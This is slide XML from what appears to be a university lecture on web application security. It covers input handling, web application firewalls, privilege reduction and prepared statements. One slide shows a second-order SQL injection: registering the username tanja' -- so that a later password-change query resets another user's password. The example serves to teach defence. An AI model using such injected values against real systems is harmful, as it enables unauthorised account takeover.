            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>, on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>within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application</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But beware of data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>coming</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from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supposedly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trusted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places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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                      or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> course webpage)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="18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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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431691" y="2276872"/>
            <a:ext cx="4235925" cy="1656184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 5" descr="C:\Users\erikpoll\Desktop\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71981" r="35184" b="7453"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1613756" y="5445224"/>
            <a:ext cx="108012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3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Example: 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> order SQL injection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/>
              <a:t>Suppose I want to access tanja's account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>I register an account myself with the name </a:t>
            </a:r>
            <a:r>
              <a:rPr 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tanja' -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>I log in as </a:t>
            </a:r>
            <a:r>
              <a:rPr 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tanja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>and change my password </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>If the password change is done with the SQL statement  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GB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 users                                                     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SET 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password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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'abcd1234'                                  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username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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GB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tanja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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--' 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password='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457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>then I have reset tanja's password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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abcd1234 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>is user input, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the dangerous input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from the server's own database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>injected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>earlier</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The moral of the story:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input, not even data coming from sources you think can trust</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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GB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1034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Web Application Firewall (WAF)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sz="1800" dirty="0" smtClean="0"/>
              <a:t>A separate firewall in front of a web-application to stop malicious inputs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>undamental problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WAF has no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>clue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> what the web application is doing, and what it expects as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inputs</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" i="1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1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Therefore</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>WAF can only stop very generic problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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dirty="0" err="1" smtClean="0"/>
              <a:t>improve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, some WAFs can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>to learn what normal inputs looks like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800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>So</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> proper input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" b="1" i="1" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>to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done</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>application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itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1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nl-NL" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> extra line of defence? Or does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>it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lull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> programmers into a false sense of security?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393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Defences:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Reducing expressive power</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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1997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9803"/>
            <a:ext cx="5867400" cy="478872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276225"/>
            <a:ext cx="7761288" cy="685009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>Additional input channel?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" baseline="-25000" dirty="0">
              <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Rechte verbindingslijn met pijl 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3301997" y="1669733"/>
            <a:ext cx="2779848" cy="212597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Rechte verbindingslijn met pijl 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2775127" y="3034340"/>
            <a:ext cx="3306718" cy="88536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Rechte verbindingslijn met pijl 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3779912" y="4165459"/>
            <a:ext cx="2301933" cy="41567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Rechte verbindingslijn met pijl 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1835696" y="4320532"/>
            <a:ext cx="4320480" cy="76465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5" name="Tekstvak 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151933" y="3674201"/>
            <a:ext cx="194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C00000"/>
                </a:solidFill>
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>INPUT</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Pieces NF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Recall: Defensive Techniques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Prevent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Typically by secure input handling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But also: secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>output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  handling! More on this later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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933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the potential impact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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reduce the expressive power of inputs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Reduce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>priviliges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, or                                                                          isolate aka sandbox aka compartmentalise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3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Do not run your web server as root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3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Do not run your customer web server on same machine as your salary administration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3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Run JavaScript inside browser sandbox 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Detection &amp; react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Monitor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to see if things go/have gone wrong</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Keep logs if only for forensics afterwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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1358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Recall forwarding flaws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16013"/>
            <a:ext cx="7990656" cy="4968875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1800" dirty="0" smtClean="0"/>
              <a:t>The service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>provides a very powerful interface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>to the application, and hence to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>sually, the interface takes a                    and the service executes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  OS command, access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  file, execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> SQL command, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Even though the application may only requires a fraction of this power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>	Maybe the service should  simply not offer all this power?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Groep 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="827584" y="1148270"/>
            <a:ext cx="6870436" cy="2036067"/>
            <a:chOff x="1074187" y="3855199"/>
            <a:chExt cx="7186985" cy="2410731"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Right Arrow 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5276982" y="4860655"/>
              <a:ext cx="1027640" cy="38528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7" name="L-Shape 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6379909" y="4134469"/>
              <a:ext cx="1881263" cy="2131461"/>
            </a:xfrm>
            <a:prstGeom prst="corner">
              <a:avLst>
                <a:gd name="adj1" fmla="val 30464"/>
                <a:gd name="adj2" fmla="val 288889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dirty="0" smtClean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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="18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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean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>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1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“Service”, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0" err="1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eg</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean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OS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file system</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="18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database</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="18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library</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="18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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="18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8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187" y="4318804"/>
              <a:ext cx="883459" cy="883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ight Arrow 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2210476" y="4512642"/>
              <a:ext cx="978468" cy="26207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0" name="TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2128153" y="3855199"/>
              <a:ext cx="151765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input</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="18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Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3521715" y="3933917"/>
              <a:ext cx="1653532" cy="177966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application</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="20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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-GB" sz="20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3" name="Rechthoek 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5316469" y="4972812"/>
              <a:ext cx="143326" cy="16097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4" name="Rechthoek 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5522013" y="4970196"/>
              <a:ext cx="143326" cy="16097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5" name="Rechthoek 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5727557" y="4970196"/>
              <a:ext cx="143326" cy="16097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6" name="Rechthoek 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5921751" y="4970196"/>
              <a:ext cx="143326" cy="16097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2" name="Explosie 2 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5665339" y="4402177"/>
              <a:ext cx="817565" cy="483002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92125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Times New Roman" pitchFamily="16" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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61" y="3939864"/>
            <a:ext cx="997050" cy="42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/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Prepared statements: the basic idea</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="2000" dirty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116013"/>
            <a:ext cx="7918648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99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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>raw string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as single input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2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499"/>
              </a:spcBef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endParaRPr lang="en-GB" altLang="nl-NL" b="1" dirty="0" smtClean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33" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
